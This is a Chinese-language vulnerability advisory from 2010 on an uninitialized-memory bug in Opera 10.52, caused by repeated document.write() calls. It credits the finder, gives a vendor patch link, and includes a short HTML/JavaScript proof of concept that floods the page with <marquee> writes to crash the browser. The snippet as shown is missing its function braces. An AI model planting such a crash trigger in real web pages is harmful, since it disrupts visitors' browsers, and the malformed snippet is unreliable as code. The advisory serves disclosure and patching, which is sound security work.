Opera浏览器内容写入未初始化内存漏洞


发布日期:2010-04-27
更新日期:2010-04-29

受影响系统:
Opera Software Opera 10.52
描述:
--------------------------------------------------------------------------------
Opera是一款流行的WEB浏览器,支持多种平台。

Opera浏览器在使用document.write()函数连续向页面写入内容时存在错误,用户受骗访问了恶意网页就可以导致使用未初始化的内存,浏览器可能会崩溃。

<*来源:Mathias Karlsson
 
  链接:http://secunia.com/advisories/39590/
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html> 

<script> 

loop(); 

function loop() 

    setInterval(doit,0); 

function doit() 

    var b="<marquee>"; 

    document.write(b); 

    setInterval(loop,0); 

</script> 

</html>

建议:
--------------------------------------------------------------------------------
厂商补丁:

Opera Software
--------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://my.opera.com/desktopteam/blog/2010/04/28/opera-10-53-rc1-for-windows-and-mac

相关内容